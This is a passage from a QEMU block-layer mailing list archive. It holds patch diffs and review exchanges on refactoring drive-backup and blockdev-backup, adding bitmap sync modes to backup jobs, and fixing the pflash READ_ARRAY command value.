-#'absolute-paths'.
-#
-# @speed: the maximum speed, in bytes per second
+# @speed: the maximum speed, in bytes per second. The default is 0,
+# for unlimited.
 #
 # @bitmap: the name of dirty bitmap if sync is "incremental".
 #  Must be present if sync is "incremental", must NOT be present
-#  otherwise. (Since 2.4)
+#  otherwise. (Since 2.4 (drive-backup), 3.1 (blockdev-backup))
 #
 # @compress: true to compress data, if the target format supports it.
 #(default: false) (since 2.8)
@@ -1370,75 +1361,47 @@
 # I/O.  If an error occurs during a guest write request, the device's
 # rerror/werror actions will be used.
 #
+# Since: 4.2
+##
+{ 'struct': 'BackupCommon',
+  'data': { '*job-id': 'str', 'device': 'str',
+'sync': 'MirrorSyncMode', '*speed': 'int',
+'*bitmap': 'str', '*compress': 'bool',
+'*on-source-error': 'BlockdevOnError',
+'*on-target-error': 'BlockdevOnError',
+'*auto-finalize': 'bool', '*auto-dismiss': 'bool' } }
+
+##
+# @DriveBackup:
+#
+# @target: the target of the new image. If the file exists, or if it
+#  is a device, the existing file/device will be used as the new
+#  destination.  If it does not exist, a new file will be created.
+#
+# @format: the format of the new destination, default is to
+#  probe if @mode is 'existing', else the format of the source
+#
+# @mode: whether and how QEMU should create a new image, default is
+#'absolute-paths'.
+#
 # Since: 1.6
 ##
 { 'struct': 'DriveBackup',
-  'data': { '*job-id': 'str', 'device': 'str', 'target': 'str',
-'*format': 'str', 'sync': 'MirrorSyncMode',
-'*mode': 'NewImageMode', '*speed': 'int',
-'*bitmap': 'str', '*compress': 'bool',
-'*on-source-error': 'BlockdevOnError',
-'*on-target-error': 'BlockdevOnError',
-'*auto-finalize': 'bool', '*auto-dismiss': 'bool' } }
+  'base': 'BackupCommon',
+  'data': { 'target': 'str',
+'*format': 'str',
+'*mode': 'NewImageMode' } }
 
 ##
 # @BlockdevBackup:
 #
-# @job-id: identifier for the newly-created block job. If
-#  omitted, the device name will be used. (Since 2.7)
-#
-# @device: the device name or node-name of a root node which should be copied.
-#
 # @target: the device name or node-name of the backup target node.
 #
-# @sync: what parts of the disk image should be copied to the destination
-#(all the disk, only the sectors allocated in the topmost image, or
-#only new I/O).
-#
-# @speed: the maximum speed, in bytes per second. The default is 0,
-# for unlimited.
-#
-# @bitmap: the name of dirty bitmap if sync is "incremental".
-#  Must be present if sync is "incremental", must NOT be present
-#  otherwise. (Since 3.1)
-#
-# @compress: true to compress data, if the target format supports it.
-#(default: false) (since 2.8)
-#
-# @on-source-error: the action to take on an error on the source,
-#   default 'report'.  'stop' and 'enospc' can only be used
-#   if the block device supports io-status (see BlockInfo).
-#
-# @on-target-error: the action to take on an error on the target,
-#   default 'report' (no limitations, since this applies to
-#   a different block device than @device).
-#
-# @auto-finalize: When false, this 
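With BackupCommon as the shared base, both commands accept the same set of
common arguments and differ only in 'target' (plus 'format'/'mode' for
drive-backup). A usage sketch, assuming existing 'drive0' and 'fleece0' nodes
and an iotests-style vm wrapper:

    common = dict(job_id='backup0', device='drive0', sync='full',
                  speed=0, compress=False,
                  on_source_error='report', on_target_error='report',
                  auto_finalize=True, auto_dismiss=True)

    vm.qmp_log('drive-backup', target='/tmp/backup.qcow2', format='qcow2',
               mode='absolute-paths', **common)
    vm.qmp_log('blockdev-backup', target='fleece0',
               **dict(common, job_id='backup1'))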

[Qemu-block] [PATCH v3 03/18] blockdev-backup: utilize do_backup_common

2019-07-05 Thread John Snow
Signed-off-by: John Snow 
---
 blockdev.c | 65 +-
 1 file changed, 6 insertions(+), 59 deletions(-)

diff --git a/blockdev.c b/blockdev.c
index 5bc8ecd087..77365d8166 100644
--- a/blockdev.c
+++ b/blockdev.c
@@ -3624,78 +3624,25 @@ BlockJob *do_blockdev_backup(BlockdevBackup *backup, 
JobTxn *txn,
 {
 BlockDriverState *bs;
 BlockDriverState *target_bs;
-Error *local_err = NULL;
-BdrvDirtyBitmap *bmap = NULL;
 AioContext *aio_context;
-BlockJob *job = NULL;
-int job_flags = JOB_DEFAULT;
-int ret;
-
-if (!backup->has_speed) {
-backup->speed = 0;
-}
-if (!backup->has_on_source_error) {
-backup->on_source_error = BLOCKDEV_ON_ERROR_REPORT;
-}
-if (!backup->has_on_target_error) {
-backup->on_target_error = BLOCKDEV_ON_ERROR_REPORT;
-}
-if (!backup->has_job_id) {
-backup->job_id = NULL;
-}
-if (!backup->has_auto_finalize) {
-backup->auto_finalize = true;
-}
-if (!backup->has_auto_dismiss) {
-backup->auto_dismiss = true;
-}
-if (!backup->has_compress) {
-backup->compress = false;
-}
+BlockJob *job;
 
 bs = bdrv_lookup_bs(backup->device, backup->device, errp);
 if (!bs) {
 return NULL;
 }
 
-aio_context = bdrv_get_aio_context(bs);
-aio_context_acquire(aio_context);
-
 target_bs = bdrv_lookup_bs(backup->target, backup->target, errp);
 if (!target_bs) {
-goto out;
+return NULL;
 }
 
-ret = bdrv_try_set_aio_context(target_bs, aio_context, errp);
-if (ret < 0) {
-goto out;
-}
+aio_context = bdrv_get_aio_context(bs);
+aio_context_acquire(aio_context);
 
-if (backup->has_bitmap) {
-bmap = bdrv_find_dirty_bitmap(bs, backup->bitmap);
-if (!bmap) {
-error_setg(errp, "Bitmap '%s' could not be found", backup->bitmap);
-goto out;
-}
-if (bdrv_dirty_bitmap_check(bmap, BDRV_BITMAP_DEFAULT, errp)) {
-goto out;
-}
-}
+job = do_backup_common(qapi_BlockdevBackup_base(backup),
+   bs, target_bs, aio_context, txn, errp);
 
-if (!backup->auto_finalize) {
-job_flags |= JOB_MANUAL_FINALIZE;
-}
-if (!backup->auto_dismiss) {
-job_flags |= JOB_MANUAL_DISMISS;
-}
-job = backup_job_create(backup->job_id, bs, target_bs, backup->speed,
-backup->sync, bmap, backup->compress,
-backup->on_source_error, backup->on_target_error,
-job_flags, NULL, NULL, txn, &local_err);
-if (local_err != NULL) {
-error_propagate(errp, local_err);
-}
-out:
 aio_context_release(aio_context);
 return job;
 }
-- 
2.21.0




[Qemu-block] [PATCH v3 00/18] bitmaps: introduce 'bitmap' sync mode

2019-07-05 Thread John Snow
This series adds a new "BITMAP" sync mode that is meant to replace the
existing "INCREMENTAL" sync mode.

This mode can have its behavior modified by issuing any of three bitmap sync
modes, passed as arguments to the job.

The three bitmap sync modes are:
- ON-SUCCESS: This is an alias for the old incremental mode. The bitmap is
  conditionally synchronized based on the return code of the job
  upon completion.
- NEVER: This is, effectively, the differential backup mode. It never clears
 the bitmap, as the name suggests.
- ALWAYS: Here is the new, exciting thing. The bitmap is always synchronized,
  even on failure. On success, this is identical to incremental, but
  on failure it clears only the bits that were copied successfully.
  This can be used to "resume" incremental backups from later points
  in time.
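
As a rough illustration of the three policies above (a sketch only, using
the enum names the QAPI schema in this series would generate -- not the
actual job code):

    static bool bitmap_should_sync(BitmapSyncMode policy, int job_ret)
    {
        switch (policy) {
        case BITMAP_SYNC_MODE_NEVER:
            return false;              /* differential: never touch the bitmap */
        case BITMAP_SYNC_MODE_ON_SUCCESS:
            return job_ret == 0;       /* old 'incremental' behavior */
        case BITMAP_SYNC_MODE_ALWAYS:
            return true;               /* sync even on failure */
        default:
            abort();
        }
    }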

I wrote this series by accident on my way to implement incremental mode
for mirror, but this happened first -- the problem is that Mirror mode
uses its existing modes in a very particular way; and this was the best
way to add bitmap support into the mirror job properly.

Summary:
- 01-03: refactor blockdev-backup and drive-backup to share more interface code
- 04-05: add the new 'bitmap' sync mode with sync policy 'conditional',
 which is functionally identical to 'incremental' sync mode.
- 06:add sync policy 'never' ("Differential" backups.)
- 07-11: rework some merging code to facilitate patch 12;
- 12:add sync policy 'always' ("Resumable" backups)
- 13-16: test infrastructure changes to support patch 17;
- 17:new iotest!
- 18:minor policy loosening as a QOL improvement

Future work:
 - Update bitmaps.rst to explain these. (WIP, it's hard, sorry!)
 - Add these modes to Mirror. (Done*, but needs tests.)
 - Allow the use of bitmaps and bitmap sync modes with non-BITMAP modes;
   This will allow for resumable/re-tryable full backups.

===
V3:
===

Key:
[----] : patches are identical
[####] : number of functional differences between upstream/downstream patch
[down] : patch is downstream-only
The flags [FC] indicate (F)unctional and (C)ontextual differences, respectively

001/18:[0006] [FC] 'qapi/block-core: Introduce BackupCommon'
002/18:[0032] [FC] 'drive-backup: create do_backup_common'
003/18:[0020] [FC] 'blockdev-backup: utilize do_backup_common'
004/18:[0006] [FC] 'qapi: add BitmapSyncMode enum'
005/18:[0019] [FC] 'block/backup: Add mirror sync mode 'bitmap''
006/18:[0010] [FC] 'block/backup: add 'never' policy to bitmap sync mode'
007/18:[----] [--] 'hbitmap: Fix merge when b is empty, and result is not an alias of a'
008/18:[----] [--] 'hbitmap: enable merging across granularities'
009/18:[0005] [FC] 'block/dirty-bitmap: add bdrv_dirty_bitmap_merge_internal'
010/18:[0003] [FC] 'block/dirty-bitmap: add bdrv_dirty_bitmap_get'
011/18:[0021] [FC] 'block/backup: upgrade copy_bitmap to BdrvDirtyBitmap'
012/18:[0020] [FC] 'block/backup: add 'always' bitmap sync policy'
013/18:[----] [--] 'iotests: add testing shim for script-style python tests'
014/18:[----] [--] 'iotests: teach run_job to cancel pending jobs'
015/18:[0005] [FC] 'iotests: teach FilePath to produce multiple paths'
016/18:[----] [--] 'iotests: Add virtio-scsi device helper'
017/18:[0038] [FC] 'iotests: add test 257 for bitmap-mode backups'
018/18:[----] [-C] 'block/backup: loosen restriction on readonly bitmaps'

001: Made suggested doc fixes.
 Changed 'since' to 4.2.
002: Added bds and aio_context to backup_common
 Removed accidental extraneous unref on target_bs
 Removed local_err propagation
003: Fallout from #002; hoist aio_context acquisition up into do_blockdev_backup
004: 'conditional' --> 'on-success'
005: Rediscover the lost stanza that ensures a bitmap mode was given
 Fallout from 2, 3, 4.
006: Block comment fix for patchew
 Fallout from #4
009: Fix assert() style issue. Why'd they let a macro be lowercase like that?
 Probably to make specifically my life difficult.
010: Fix style issue {
011: Fix long lines
 rename "bs" --> "target_bs" where appropriate
 Free copy_bitmap from the right node
012: Multiline comment changes for patchew
 Fallout from #4
015: Fix long line for patchew
 Reinstate that second newline that Max likes
017: Fallout from #4.

===
V2:
===

Changes:
004: Fixed typo
 Change @conditional docstring
005: Moved desugaring code into blockdev.c, facilitated by patches 1-3.
006: Change @never docstring slightly.
007: Merge will clear the target bitmap when both components bitmaps are empty,
 and the target bitmap is not an alias of either component bitmap.
008: Check orig_size (logical size) instead of size (actual size) to enable
 cross-granularity merging.
 Fix the sparse merge itself, based on the block/backup code.
 Clear the target bitmap before cross-granularity merge.
 Assert the size is itself equal when logical size and granularities are
 

Re: [Qemu-block] [PATCH v2 10/18] block/dirty-bitmap: add bdrv_dirty_bitmap_get

2019-07-05 Thread John Snow



On 7/4/19 1:01 PM, Max Reitz wrote:
> On 03.07.19 23:55, John Snow wrote:
>> Add a public interface for get. While we're at it,
>> rename "bdrv_get_dirty_bitmap_locked" to "bdrv_dirty_bitmap_get_locked".
>>
>> (There are more functions to rename to the bdrv_dirty_bitmap_VERB form,
>> but they will wait until the conclusion of this series.)
>>
>> Signed-off-by: John Snow 
>> ---
>>  block/dirty-bitmap.c | 18 +++---
>>  block/mirror.c   |  2 +-
>>  include/block/dirty-bitmap.h |  4 ++--
>>  migration/block.c|  5 ++---
>>  nbd/server.c |  2 +-
>>  5 files changed, 17 insertions(+), 14 deletions(-)
>>
>> diff --git a/block/dirty-bitmap.c b/block/dirty-bitmap.c
>> index b0f76826b3..97541521ab 100644
>> --- a/block/dirty-bitmap.c
>> +++ b/block/dirty-bitmap.c
>> @@ -509,14 +509,18 @@ BlockDirtyInfoList 
>> *bdrv_query_dirty_bitmaps(BlockDriverState *bs)
>>  }
>>  
>>  /* Called within bdrv_dirty_bitmap_lock..unlock */
>> -bool bdrv_get_dirty_locked(BlockDriverState *bs, BdrvDirtyBitmap *bitmap,
>> -   int64_t offset)
>> +bool bdrv_dirty_bitmap_get_locked(BdrvDirtyBitmap *bitmap, int64_t offset)
>>  {
>> -if (bitmap) {
>> -return hbitmap_get(bitmap->bitmap, offset);
>> -} else {
>> -return false;
>> -}
>> +return hbitmap_get(bitmap->bitmap, offset);
>> +}
>> +
>> +bool bdrv_dirty_bitmap_get(BdrvDirtyBitmap *bitmap, int64_t offset) {
> 
> I’m sure Patchew has told this already, but this is not Rust yet.
> 
> With that fixed:
> 
> Reviewed-by: Max Reitz 
> 

Why wait for rust to start living dangerously?

(Actually, just a thinko: I've been doing so much python lately that I
can only just barely remember to use a { instead of a :, and ...)



Re: [Qemu-block] [PATCH v2 02/18] drive-backup: create do_backup_common

2019-07-05 Thread John Snow



On 7/4/19 11:06 AM, Max Reitz wrote:
> On 03.07.19 23:55, John Snow wrote:
>> Create a common core that comprises the actual meat of what the backup API
>> boundary needs to do, and then switch drive-backup to use it.
>>
>> Questions:
>>  - do_drive_backup now acquires and releases the aio_context in addition
>>to do_backup_common doing the same. Can I drop this from drive_backup?
> 
> I wonder why you don’t just make it a requirement that
> do_backup_common() is called with the context acquired?
> 

Oh, I remember: I wasn't actually sure if any of the calls that
drive-backup makes actually requires the AioContext. If none of them do, no
reason to acquire it in two places and pass it in to the common function.

Probably bdrv_getlength and bdrv_refresh_filename both need it, though.
(Or at least, I can't promise that they never would.)
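
For illustration, the pattern in question would look roughly like this
(a sketch only, not the series' final code):

    /* bs is the source node, already looked up via bdrv_lookup_bs() */
    AioContext *aio_context = bdrv_get_aio_context(bs);
    int64_t total_size;

    aio_context_acquire(aio_context);
    total_size = bdrv_getlength(bs);      /* done under the acquired context */
    bdrv_refresh_filename(bs);
    aio_context_release(aio_context);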

--js



Re: [Qemu-block] [PATCH v2 02/18] drive-backup: create do_backup_common

2019-07-05 Thread John Snow



On 7/4/19 11:06 AM, Max Reitz wrote:
> On 03.07.19 23:55, John Snow wrote:
>> Create a common core that comprises the actual meat of what the backup API
>> boundary needs to do, and then switch drive-backup to use it.
>>
>> Questions:
>>  - do_drive_backup now acquires and releases the aio_context in addition
>>to do_backup_common doing the same. Can I drop this from drive_backup?
> 
> I wonder why you don’t just make it a requirement that
> do_backup_common() is called with the context acquired?
> 

Ehm, it just honestly didn't occur to me that I could acquire the
context before doing the input sanitizing.

In this case, it is OK to do it, so I will hoist it back up into
do_blockdev_backup.

--js

>> Signed-off-by: John Snow 
>> ---
>>  blockdev.c | 138 -
>>  1 file changed, 83 insertions(+), 55 deletions(-)
>>
>> diff --git a/blockdev.c b/blockdev.c
>> index 4d141e9a1f..5fd663a7e5 100644
>> --- a/blockdev.c
>> +++ b/blockdev.c
>> @@ -3425,6 +3425,86 @@ out:
>>  aio_context_release(aio_context);
>>  }
>>  
>> +static BlockJob *do_backup_common(BackupCommon *backup,
>> +  BlockDriverState *target_bs,
>> +  JobTxn *txn, Error **errp)
>> +{
> 
> [...]
> 
>> +job = backup_job_create(backup->job_id, bs, target_bs, backup->speed,
>> +backup->sync, bmap, backup->compress,
>> +backup->on_source_error, 
>> backup->on_target_error,
>> +job_flags, NULL, NULL, txn, &local_err);
>> +if (local_err != NULL) {
>> +error_propagate(errp, local_err);
>> +goto out;
>> +}
> 
> Below, you change do_drive_backup() to just pass errp instead of
> local_err and not do error handling.  Why not do the same here?
> 

Inertia.

> Other than that:
> 
> Reviewed-by: Max Reitz 
> 

Suggestions applied, thank you.



Re: [Qemu-block] [PATCH v2 12/18] block/backup: add 'always' bitmap sync policy

2019-07-05 Thread John Snow



On 7/4/19 2:05 PM, Max Reitz wrote:
> On 04.07.19 19:43, Max Reitz wrote:
>> On 03.07.19 23:55, John Snow wrote:
>>> This adds an "always" policy for bitmap synchronization. Regardless of if
>>> the job succeeds or fails, the bitmap is *always* synchronized. This means
>>> that for backups that fail part-way through, the bitmap retains a record of
>>> which sectors need to be copied out to accomplish a new backup using the
>>> old, partial result.
>>>
>>> In effect, this allows us to "resume" a failed backup; however the new 
>>> backup
>>> will be from the new point in time, so it isn't a "resume" as much as it is
>>> an "incremental retry." This can be useful in the case of extremely large
>>> backups that fail considerably through the operation and we'd like to not 
>>> waste
>>> the work that was already performed.
>>>
>>> Signed-off-by: John Snow 
>>> ---
>>>  block/backup.c   | 25 +
>>>  qapi/block-core.json |  5 -
>>>  2 files changed, 21 insertions(+), 9 deletions(-)
>>>
>>> diff --git a/block/backup.c b/block/backup.c
>>> index 9cc5a7f6ca..495d8f71aa 100644
>>> --- a/block/backup.c
>>> +++ b/block/backup.c
>>> @@ -266,16 +266,25 @@ static void backup_cleanup_sync_bitmap(BackupBlockJob 
>>> *job, int ret)
> 
> [...]
> 
>>> +/* If we failed and synced, merge in the bits we didn't copy: */
>>> +bdrv_dirty_bitmap_merge_internal(bm, job->copy_bitmap,
>>> + NULL, true);
>>
>> I presume this is for sync=full?
> 

Well, we don't allow bitmaps for sync=full at this point in the series.

> Ah, no.  This is necessary because the original sync bitmap was
> discarded by bdrv_dirty_bitmap_abdicate().  So yep, these bits need to
> go back into the sync bitmap then.
> 
> Max
> 

Yuh -- we actually want to clear the original bitmap for the 'always'
case, which the "abdicate" handles for us. This ought to trigger only
for the always case, so I think the conditional here is correct and as
simple as it can be.

Does your R-B stand?

--js



Re: [Qemu-block] [PATCH v2 11/18] block/backup: upgrade copy_bitmap to BdrvDirtyBitmap

2019-07-05 Thread John Snow



On 7/4/19 1:29 PM, Max Reitz wrote:
> On 03.07.19 23:55, John Snow wrote:
>> This simplifies some interface matters; namely the initialization and
>> (later) merging the manifest back into the sync_bitmap if it was
>> provided.
>>
>> Signed-off-by: John Snow 
>> ---
>>  block/backup.c | 76 --
>>  1 file changed, 37 insertions(+), 39 deletions(-)
>>
>> diff --git a/block/backup.c b/block/backup.c
>> index d7fdafebda..9cc5a7f6ca 100644
>> --- a/block/backup.c
>> +++ b/block/backup.c
> 
> [...]
> 
>> @@ -202,7 +204,7 @@ static int coroutine_fn backup_do_cow(BackupBlockJob 
>> *job,
>>  cow_request_begin(&cow_request, job, start, end);
>>  
>>  while (start < end) {
>> -if (!hbitmap_get(job->copy_bitmap, start)) {
>> +if (!bdrv_dirty_bitmap_get(job->copy_bitmap, start)) {
>>  trace_backup_do_cow_skip(job, start);
>>  start += job->cluster_size;
>>  continue; /* already copied */
>> @@ -296,14 +298,16 @@ static void backup_abort(Job *job)
>>  static void backup_clean(Job *job)
>>  {
>>  BackupBlockJob *s = container_of(job, BackupBlockJob, common.job);
>> +BlockDriverState *bs = blk_bs(s->target);
> 
> I’d prefer to call it target_bs, because “bs” is usually the source node.
> 

Sure;

> Which brings me to a question: Why is the copy bitmap assigned to the
> target in the first place?  Wouldn’t it make more sense on the source?
> 

*cough*;

the idea was that the target is *most likely* to be the temporary node
created for the purpose of this backup, even though backup does not
explicitly create the node.

So ... by creating it on the target, we avoid cluttering up the results
in block query; and otherwise it doesn't actually matter what node we
created it on, really.

I can move it over to the source, but the testing code has to get a
little smarter in order to find the "right" anonymous bitmap, which is
not impossible; but I thought this would actually be a convenience for
people.

>> +
>> +if (s->copy_bitmap) {
>> +bdrv_release_dirty_bitmap(bs, s->copy_bitmap);
>> +s->copy_bitmap = NULL;
>> +}
>> +
>>  assert(s->target);
>>  blk_unref(s->target);
>>  s->target = NULL;
>> -
>> -if (s->copy_bitmap) {
>> -hbitmap_free(s->copy_bitmap);
>> -s->copy_bitmap = NULL;
>> -}
>>  }
>>  
>>  void backup_do_checkpoint(BlockJob *job, Error **errp)
> 
> [...]
> 
>> @@ -387,59 +391,49 @@ static bool bdrv_is_unallocated_range(BlockDriverState 
>> *bs,
>>  
>>  static int coroutine_fn backup_loop(BackupBlockJob *job)
>>  {
>> -int ret;
>>  bool error_is_read;
>>  int64_t offset;
>> -HBitmapIter hbi;
>> +BdrvDirtyBitmapIter *bdbi;
>>  BlockDriverState *bs = blk_bs(job->common.blk);
>> +int ret = 0;
>>  
>> -hbitmap_iter_init(&hbi, job->copy_bitmap, 0);
>> -while ((offset = hbitmap_iter_next(&hbi)) != -1) {
>> +bdbi = bdrv_dirty_iter_new(job->copy_bitmap);
>> +while ((offset = bdrv_dirty_iter_next(bdbi)) != -1) {
>>  if (job->sync_mode == MIRROR_SYNC_MODE_TOP &&
>>  bdrv_is_unallocated_range(bs, offset, job->cluster_size))
>>  {
>> -hbitmap_reset(job->copy_bitmap, offset, job->cluster_size);
>> +bdrv_set_dirty_bitmap(job->copy_bitmap, offset, 
>> job->cluster_size);
> 
> Should be reset.
> 

Whoa, oops! I got through testing FULL but, clearly, not TOP. This also
doesn't trigger any other failures in our test suite, so I need to make
sure this is being covered.

Thank you.

>>  continue;
>>  }
>>  
>>  do {
>>  if (yield_and_check(job)) {
>> -return 0;
>> +goto out;
>>  }
>>  ret = backup_do_cow(job, offset,
>>  job->cluster_size, _is_read, false);
>>  if (ret < 0 && backup_error_action(job, error_is_read, -ret) ==
>> BLOCK_ERROR_ACTION_REPORT)
>>  {
>> -return ret;
>> +goto out;
>>  }
>>  } while (ret < 0);
>>  }
>>  
>> -return 0;
>> + out:
>> +bdrv_dirty_iter_free(bdbi);
>> +return ret;
>>  }
>>  
>>  /* init copy_bitmap from sync_bitmap */
>>  static void backup_incremental_init_copy_bitmap(BackupBlockJob *job)
>>  {
>> -uint64_t offset = 0;
>> -uint64_t bytes = job->len;
>> -
>> -while (bdrv_dirty_bitmap_next_dirty_area(job->sync_bitmap,
>> - &offset, &bytes))
>> -{
>> -hbitmap_set(job->copy_bitmap, offset, bytes);
>> -
>> -offset += bytes;
>> -if (offset >= job->len) {
>> -break;
>> -}
>> -bytes = job->len - offset;
>> -}
>> +bdrv_dirty_bitmap_merge_internal(job->copy_bitmap, job->sync_bitmap,
>> + NULL, true);
> 
> How about asserting that this was successful?
> 

Sure.

>>  
>>   

Re: [Qemu-block] [PATCH v3 2/9] hw/block/pflash_cfi01: Use the correct READ_ARRAY value

2019-07-05 Thread Laszlo Ersek
On 07/05/19 17:46, Philippe Mathieu-Daudé wrote:
> In the "Read Array Flowchart" the command has a value of 0xFF.
> 
> In the document [*] the "Read Array Flowchart", the READ_ARRAY
> command has a value of 0xff.
> 
> Use the correct value in the pflash model.
> 
> There is no change of behavior in the guest, because:
> - when the guest was sending 0xFF, the reset_flash label
>   was setting the command value as 0x00
> - 0x00 was used internally for READ_ARRAY
> 
> To keep migration behaving correctly, we have to increase
> the VMState version. When migrating from an older version,
> we use the correct command value.
> 
> [*] "Common Flash Interface (CFI) and Command Sets"
> (Intel Application Note 646)
> Appendix B "Basic Command Set"
> 
> Reviewed-by: John Snow 
> Reviewed-by: Alistair Francis 
> Regression-tested-by: Laszlo Ersek 
> Signed-off-by: Philippe Mathieu-Daudé 
> ---
> v3: Handle migrating the 'cmd' field.
> 
> Since Laszlo stated he did not test migration [*], I'm keeping his
> test tag, because the change since v2 has no impact on the tests
> he ran.

My thinking exactly. Thanks!
Laszlo

> 
> Likewise I'm keeping John and Alistair tags, but I'd like an extra
> review for the migration change, thanks!
> 
> [*] https://lists.gnu.org/archive/html/qemu-devel/2019-07/msg00679.html
> ---
>  hw/block/pflash_cfi01.c | 23 +--
>  1 file changed, 13 insertions(+), 10 deletions(-)
> 
> diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
> index 9e34fd4e82..58cbef0588 100644
> --- a/hw/block/pflash_cfi01.c
> +++ b/hw/block/pflash_cfi01.c
> @@ -100,7 +100,7 @@ static int pflash_post_load(void *opaque, int version_id);
>  
>  static const VMStateDescription vmstate_pflash = {
>  .name = "pflash_cfi01",
> -.version_id = 1,
> +.version_id = 2,
>  .minimum_version_id = 1,
>  .post_load = pflash_post_load,
>  .fields = (VMStateField[]) {
> @@ -277,10 +277,9 @@ static uint32_t pflash_read(PFlashCFI01 *pfl, hwaddr 
> offset,
>  /* This should never happen : reset state & treat it as a read */
>  DPRINTF("%s: unknown command state: %x\n", __func__, pfl->cmd);
>  pfl->wcycle = 0;
> -pfl->cmd = 0;
> +pfl->cmd = 0xff;
>  /* fall through to read code */
> -case 0x00:
> -/* Flash area read */
> +case 0xff: /* Read Array */
>  ret = pflash_data_read(pfl, offset, width, be);
>  break;
>  case 0x10: /* Single byte program */
> @@ -448,8 +447,6 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
>  case 0:
>  /* read mode */
>  switch (cmd) {
> -case 0x00: /* ??? */
> -goto reset_flash;
>  case 0x10: /* Single Byte Program */
>  case 0x40: /* Single Byte Program */
>  DPRINTF("%s: Single Byte Program\n", __func__);
> @@ -526,7 +523,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
>  if (cmd == 0xd0) { /* confirm */
>  pfl->wcycle = 0;
>  pfl->status |= 0x80;
> -} else if (cmd == 0xff) { /* read array mode */
> +} else if (cmd == 0xff) { /* Read Array */
>  goto reset_flash;
>  } else
>  goto error_flash;
> @@ -553,7 +550,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
>  } else if (cmd == 0x01) {
>  pfl->wcycle = 0;
>  pfl->status |= 0x80;
> -} else if (cmd == 0xff) {
> +} else if (cmd == 0xff) { /* read array mode */
>  goto reset_flash;
>  } else {
>  DPRINTF("%s: Unknown (un)locking command\n", __func__);
> @@ -645,7 +642,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
>  trace_pflash_reset();
>  memory_region_rom_device_set_romd(&pfl->mem, true);
>  pfl->wcycle = 0;
> -pfl->cmd = 0;
> +pfl->cmd = 0xff;
>  }
>  
>  
> @@ -761,7 +758,7 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
> **errp)
>  }
>  
>  pfl->wcycle = 0;
> -pfl->cmd = 0;
> +pfl->cmd = 0xff;
>  pfl->status = 0;
>  /* Hardcoded CFI table */
>  /* Standard "QRY" string */
> @@ -1001,5 +998,11 @@ static int pflash_post_load(void *opaque, int 
> version_id)
>  pfl->vmstate = qemu_add_vm_change_state_handler(postload_update_cb,
>  pfl);
>  }
> +if (version_id < 2) {
> +/* v1 used incorrect value of 0x00 for the READ_ARRAY command. */
> +if (pfl->cmd == 0x00) {
> +pfl->cmd =  0xff;
> +}
> +}
>  return 0;
>  }
> 




Re: [Qemu-block] [PATCH v2 09/18] block/dirty-bitmap: add bdrv_dirty_bitmap_merge_internal

2019-07-05 Thread John Snow



On 7/4/19 12:49 PM, Max Reitz wrote:
> On 03.07.19 23:55, John Snow wrote:
>> I'm surprised it didn't come up sooner, but sometimes we have a +busy
>> bitmap as a source. This is dangerous from the QMP API, but if we are
>> the owner that marked the bitmap busy, it's safe to merge it using it as
>> a read only source.
>>
>> It is not safe in the general case to allow users to read from in-use
>> bitmaps, so create an internal variant that foregoes the safety
>> checking.
>>
>> Signed-off-by: John Snow 
>> ---
>>  block/dirty-bitmap.c  | 51 +--
>>  include/block/block_int.h |  3 +++
>>  2 files changed, 47 insertions(+), 7 deletions(-)
>>
>> diff --git a/block/dirty-bitmap.c b/block/dirty-bitmap.c
>> index 95a9c2a5d8..b0f76826b3 100644
>> --- a/block/dirty-bitmap.c
>> +++ b/block/dirty-bitmap.c
>> @@ -810,11 +810,15 @@ bool bdrv_dirty_bitmap_next_dirty_area(BdrvDirtyBitmap 
>> *bitmap,
>>  return hbitmap_next_dirty_area(bitmap->bitmap, offset, bytes);
>>  }
>>  
>> +/**
>> + * bdrv_merge_dirty_bitmap: merge src into dest.
>> + * Ensures permissions on bitmaps are reasonable; use for public API.
>> + *
>> + * @backup: If provided, make a copy of dest here prior to merge.
>> + */
>>  void bdrv_merge_dirty_bitmap(BdrvDirtyBitmap *dest, const BdrvDirtyBitmap 
>> *src,
>>   HBitmap **backup, Error **errp)
>>  {
>> -bool ret;
>> -
>>  qemu_mutex_lock(dest->mutex);
>>  if (src->mutex != dest->mutex) {
>>  qemu_mutex_lock(src->mutex);
>> @@ -833,6 +837,37 @@ void bdrv_merge_dirty_bitmap(BdrvDirtyBitmap *dest, 
>> const BdrvDirtyBitmap *src,
>>  goto out;
>>  }
>>  
>> +assert(bdrv_dirty_bitmap_merge_internal(dest, src, backup, false));
> 
> Please keep the explicit @ret.  We never define NDEBUG, but doing things
> with side effects inside of assert() is bad style nonetheless.
> 

Thank you for saving me from myself. I consistently forget this :(

>> +
>> +out:
>> +qemu_mutex_unlock(dest->mutex);
>> +if (src->mutex != dest->mutex) {
>> +qemu_mutex_unlock(src->mutex);
>> +}
>> +}
>> +
>> +/**
>> + * bdrv_dirty_bitmap_merge_internal: merge src into dest.
>> + * Does NOT check bitmap permissions; not suitable for use as public API.
>> + *
>> + * @backup: If provided, make a copy of dest here prior to merge.
>> + * @lock: If true, lock and unlock bitmaps on the way in/out.
>> + * returns true if the merge succeeded; false if unattempted.
>> + */
>> +bool bdrv_dirty_bitmap_merge_internal(BdrvDirtyBitmap *dest,
>> +  const BdrvDirtyBitmap *src,
>> +  HBitmap **backup,
>> +  bool lock)
>> +{
>> +bool ret;
>> +
>> +if (lock) {
>> +qemu_mutex_lock(dest->mutex);
>> +if (src->mutex != dest->mutex) {
>> +qemu_mutex_lock(src->mutex);
>> +}
>> +}
>> +
> 
> Why not check for INCONSISTENT and RO still?
> 
> Max
> 

Well. "why", I guess. The user-facing API will always use the
non-internal version. This is the scary dangerous version that you don't
call unless you are Very Sure You Know What You're Doing.

I guess I just intended for the suitability checking to happen in
bdrv_dirty_bitmap_merge, and this is the implementation that you can
shoot yourself in the foot with if you'd like.

>>  if (backup) {
>>  *backup = dest->bitmap;
>>  dest->bitmap = hbitmap_alloc(dest->size, 
>> hbitmap_granularity(*backup));
> 



Re: [Qemu-block] [Qemu-devel] [PATCH v2 04/18] qapi: add BitmapSyncMode enum

2019-07-05 Thread John Snow



On 7/5/19 10:18 AM, Markus Armbruster wrote:
> John Snow  writes:
> 
>> Depending on what a user is trying to accomplish, there might be a few
>> bitmap cleanup actions that occur when an operation is finished that
>> could be useful.
>>
>> I am proposing three:
